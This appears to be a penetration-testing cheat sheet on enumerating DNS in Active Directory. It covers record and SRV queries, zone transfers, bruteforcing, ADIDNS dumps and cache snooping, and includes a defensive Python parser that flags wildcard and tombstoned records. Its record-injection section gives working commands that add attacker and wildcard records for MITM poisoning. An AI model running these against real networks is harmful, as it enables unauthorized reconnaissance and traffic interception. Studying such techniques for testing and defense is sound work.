# DNS Enumeration
DNS enumeration reveals internal hosts, services, and Active Directory structure. ADIDNS integration creates additional attack vectors for record injection and MITM attacks.
```mermaid
flowchart TD
    A[DNS Enum] --> B[Zone Transfer]
    A --> C[Record Queries]
    A --> D[ADIDNS]
    A --> E[Reverse Lookup]
    B --> B1[AXFR]
    C --> C1[A/AAAA Records]
    C --> C2[SRV Records]
    C --> C3[TXT Records]
    D --> D1[LDAP DNS]
    D --> D2[Record Injection]
    style A fill:#00ff00,stroke:#000,color:#000
    style B1 fill:#a855f7,stroke:#000,color:#000
    style D2 fill:#a855f7,stroke:#000,color:#000
```
## Basic DNS Queries

### Record Types

```bash
# A records (IPv4)
dig @DC_IP corp.local A
nslookup -type=A corp.local DC_IP
# AAAA records (IPv6)
dig @DC_IP corp.local AAAA
# MX records
dig @DC_IP corp.local MX
# TXT records (SPF, DKIM, etc)
dig @DC_IP corp.local TXT
# NS records
dig @DC_IP corp.local NS
# SOA record
dig @DC_IP corp.local SOA
# All records
dig @DC_IP corp.local ANY
```

## Active Directory SRV Records

> **Tip**
AD uses standard SRV records to advertise services. These reveal DCs, GCs, and Kerberos servers.
```bash
# Domain Controllers
dig @DC_IP _ldap._tcp.dc._msdcs.corp.local SRV
nslookup -type=SRV _ldap._tcp.dc._msdcs.corp.local DC_IP
# Global Catalogs
dig @DC_IP _gc._tcp.corp.local SRV
dig @DC_IP _ldap._tcp.gc._msdcs.corp.local SRV
# Kerberos servers
dig @DC_IP _kerberos._tcp.corp.local SRV
dig @DC_IP _kerberos._udp.corp.local SRV
# KDC (Key Distribution Center)
dig @DC_IP _kdc._tcp.corp.local SRV
# PDC Emulator
dig @DC_IP _ldap._tcp.pdc._msdcs.corp.local SRV
# Sites
dig @DC_IP _ldap._tcp.sitename._sites.corp.local SRV
```

## Zone Transfer

> **Warning**
Zone transfers (AXFR) expose the entire DNS zone. Test carefully as this may trigger alerts.
```bash
# Attempt zone transfer
dig @DC_IP corp.local AXFR
# Using host
host -l corp.local DC_IP
# Using nslookup
nslookup
> server DC_IP
> set type=AXFR
> corp.local
# DNSrecon zone transfer
dnsrecon -d corp.local -n DC_IP -t axfr
# Fierce
fierce --domain corp.local --dns-servers DC_IP
```

## Reverse DNS Lookup

```bash
# Single IP reverse lookup
dig @DC_IP -x 10.0.0.1
# Reverse zone transfer
dig @DC_IP 0.0.10.in-addr.arpa AXFR
# Bulk reverse lookup (bash)
for ip in $(seq 1 254); do
    dig @DC_IP -x 10.0.0.$ip +short
done
# DNSrecon reverse bruteforce
dnsrecon -d corp.local -n DC_IP -r 10.0.0.0/24
# Using nmap
nmap -sL 10.0.0.0/24 --dns-servers DC_IP
```

## DNS Bruteforce

```bash
# DNSrecon bruteforce
dnsrecon -d corp.local -n DC_IP -D wordlist.txt -t brt
# Fierce
fierce --domain corp.local --dns-servers DC_IP --subdomain-file subdomains.txt
# Gobuster DNS
gobuster dns -d corp.local -r DC_IP -w wordlist.txt
# dnscan
dnscan.py -d corp.local -w wordlist.txt -r DC_IP
# Common internal subdomains to include in the wordlist:
#   mail, webmail, owa, autodiscover
#   vpn, remote, gateway
#   dc, dc01, dc02, ad
#   sql, db, database
#   web, www, intranet
#   file, files, share
#   print, printer
#   backup, bak
```

## ADIDNS Enumeration

> **Tip**
Active Directory Integrated DNS stores records in AD. Any authenticated user can query (and potentially add) records.
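
As an added example (not part of the original page, adidnsdump or Powermad), the Python below decodes the binary `dnsRecord` values that the ldapsearch and adidnsdump commands in this section return, and flags the two node types a defender reviewing ADIDNS should look at first: a wildcard (`*`) node, which answers every name that does not otherwise exist in the zone, and tombstoned nodes left behind after a record was deleted. The header layout is the 24-byte DNS_RPC_RECORD from MS-DNSP; the sample nodes are hand-constructed, not captured from a real domain.

```python
import struct
import ipaddress
from datetime import datetime, timedelta, timezone

DNS_TYPE_ZERO, DNS_TYPE_A, DNS_TYPE_AAAA = 0x0000, 0x0001, 0x001C  # MS-DNSP type numbers
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def parse_dns_record(blob: bytes) -> dict:
    """Decode one DNS_RPC_RECORD value of the dnsRecord attribute (MS-DNSP 2.3.2.2)."""
    if len(blob) < 24:
        raise ValueError("dnsRecord value shorter than the 24-byte header")
    data_len, rtype, version, rank, _flags, serial = struct.unpack("<HHBBHL", blob[:12])
    ttl = struct.unpack(">L", blob[12:16])[0]             # TtlSeconds is big-endian
    _reserved, stamp = struct.unpack("<LL", blob[16:24])  # TimeStamp: hours since 1601-01-01
    data = blob[24:24 + data_len]
    if version != 5 or len(data) != data_len:
        raise ValueError("malformed dnsRecord value")
    if rtype == DNS_TYPE_A:
        value = str(ipaddress.IPv4Address(data))
    elif rtype == DNS_TYPE_AAAA:
        value = str(ipaddress.IPv6Address(data))
    elif rtype == DNS_TYPE_ZERO and data_len == 8:
        # A tombstoned node keeps a single type-0 record whose data is the EntombedTime FILETIME.
        value = (EPOCH_1601 + timedelta(microseconds=struct.unpack("<Q", data)[0] // 10)).isoformat()
    else:
        value = data.hex()
    return {"type": rtype, "rank": rank, "serial": serial, "ttl": ttl, "data": value,
            "timestamp": None if stamp == 0 else (EPOCH_1601 + timedelta(hours=stamp)).isoformat()}

def audit_nodes(nodes) -> list:
    """nodes: iterable of (dnsNode name, [dnsRecord values]); returns review findings."""
    findings = []
    for name, blobs in nodes:
        for rec in map(parse_dns_record, blobs):
            if name == "*":
                findings.append(f"wildcard node answers every unknown name with {rec['data']}")
            elif rec["type"] == DNS_TYPE_ZERO:
                findings.append(f"{name}: tombstoned since {rec['data']}, node still in AD")
    return findings

# Constructed sample (hand-encoded hex): a dynamic A record, a static wildcard, a tombstone.
SAMPLE_NODES = [
    ("dc01", [bytes.fromhex("04000100" "05f00000" "2a000000" "00000258" "00000000" "18943800" "0a000001")]),
    ("*", [bytes.fromhex("04000100" "05f00000" "2b000000" "00000258" "00000000" "00000000" "0a000064")]),
    ("oldsrv", [bytes.fromhex("08000000" "05000000" "2c000000" "00000000" "00000000" "00000000" "00c08976453cda01")]),
]

if __name__ == "__main__":
    print("\n".join(audit_nodes(SAMPLE_NODES)))
```

A non-zero TimeStamp marks a dynamically registered record that aging/scavenging will remove; static entries created by administrators carry 0.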
### Enumerate DNS Records via LDAP

```bash
# List DNS zones
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
    -b "CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=local" "(objectClass=dnsZone)"
# List DNS records in a zone
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
    -b "DC=corp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=corp,DC=local" "(objectClass=dnsNode)" \
    name dnsRecord
# Forest DNS zones
ldapsearch -x -H ldap://DC_IP -D "user@corp.local" -W \
    -b "CN=MicrosoftDNS,DC=ForestDnsZones,DC=corp,DC=local" "(objectClass=dnsZone)"
```

### adidnsdump

```bash
# Dump all DNS records (quote the user so the shell does not eat the backslash)
adidnsdump -u 'corp.local\user' -p password ldap://DC_IP
# Output: records.csv with all ADIDNS records
# Records the account cannot read are listed with an unknown type; -r/--resolve looks them up via DNS instead
# Dump specific zone
adidnsdump -u 'corp.local\user' -p password ldap://DC_IP --zone corp.local
# Include deleted/tombstoned records
adidnsdump -u 'corp.local\user' -p password ldap://DC_IP --include-tombstoned
```

## DNSUpdate (Record Injection)

> **Warning**
Default ADIDNS permissions allow authenticated users to create new records - useful for MITM attacks!
```powershell
# List ADIDNS zones with Powermad
Import-Module Powermad
Get-ADIDNSZone -TargetDC DC_IP
# Add A record
Invoke-DNSUpdate -DNSType A -DNSName attacker -DNSData 10.0.0.100
# Add wildcard record (catch-all for MITM)
Invoke-DNSUpdate -DNSType A -DNSName '*' -DNSData 10.0.0.100
```

```bash
# Using nsupdate (create update.txt first)
cat > update.txt <<'EOF'
server DC_IP
zone corp.local
update add attacker.corp.local 86400 A 10.0.0.100
send
EOF
nsupdate update.txt
# Krbrelayx - ADIDNS poisoning
dnstool.py -u 'corp.local\user' -p password --action add --record 'attacker' --data 10.0.0.100 --type A DC_IP
```

## DNS Cache Snooping

```bash
# Check if DNS server allows cache snooping
# Non-recursive query for cached records
dig @DC_IP www.google.com A +norecurse
# If it returns results, cache snooping is possible
# This reveals what domains users have been accessing
# Check common domains
for domain in github.com dropbox.com pastebin.com; do
    echo "Checking $domain"
    dig @DC_IP $domain A +norecurse +short
done
```

## PowerShell DNS Enumeration

```powershell
# Get DNS servers
Get-DnsClientServerAddress
# DNS cache
Get-DnsClientCache
# Resolve-DnsName
Resolve-DnsName -Name corp.local -Type ALL
Resolve-DnsName -Name _ldap._tcp.dc._msdcs.corp.local -Type SRV
# Get all DNS zones (requires DNS admin)
Get-DnsServerZone -ComputerName DC
# Get DNS records (requires DNS admin)
Get-DnsServerResourceRecord -ZoneName corp.local -ComputerName DC
# Test zone transfer
$records = @()
$ns = Resolve-DnsName -Name corp.local -Type NS
$records = Resolve-DnsName -Name corp.local -Type AXFR -Server $ns[0].NameHost -DnsOnly
```

## Automated Tools

### DNSrecon

```bash
# Standard enumeration
dnsrecon -d corp.local -n DC_IP
# Standard enumeration plus an AXFR attempt (-a)
dnsrecon -d corp.local -n DC_IP -a
# Cache snooping
dnsrecon -d corp.local -n DC_IP -t snoop -D domains.txt
# Output to XML
dnsrecon -d corp.local -n DC_IP --xml output.xml
```

### CrackMapExec

```bash
# Enumerate DNS (limited)
crackmapexec smb DC_IP -u user -p pass -M dns
# Better: Query LDAP for DNS
crackmapexec ldap DC_IP -u user -p pass -M dns
```

## Common Discovery Targets

```text
# High-value DNS records to find
_msdcs.corp.local             # AD forest root
_sites.corp.local             # AD sites
_tcp.corp.local               # Service records
gc._msdcs.corp.local          # Global Catalogs
_kerberos._tcp.corp.local     # Kerberos servers
_ldap._tcp.corp.local         # LDAP servers
# Common hostnames
dc01, dc02, dc1, dc2          # Domain Controllers
sql, sql01, database          # SQL servers
exchange, mail, cas           # Exchange servers
adfs, sts                     # Federation services
ca, pki, cert                 # Certificate Authority
sccm, wsus                    # Management servers
backup, veeam, dpm            # Backup servers
```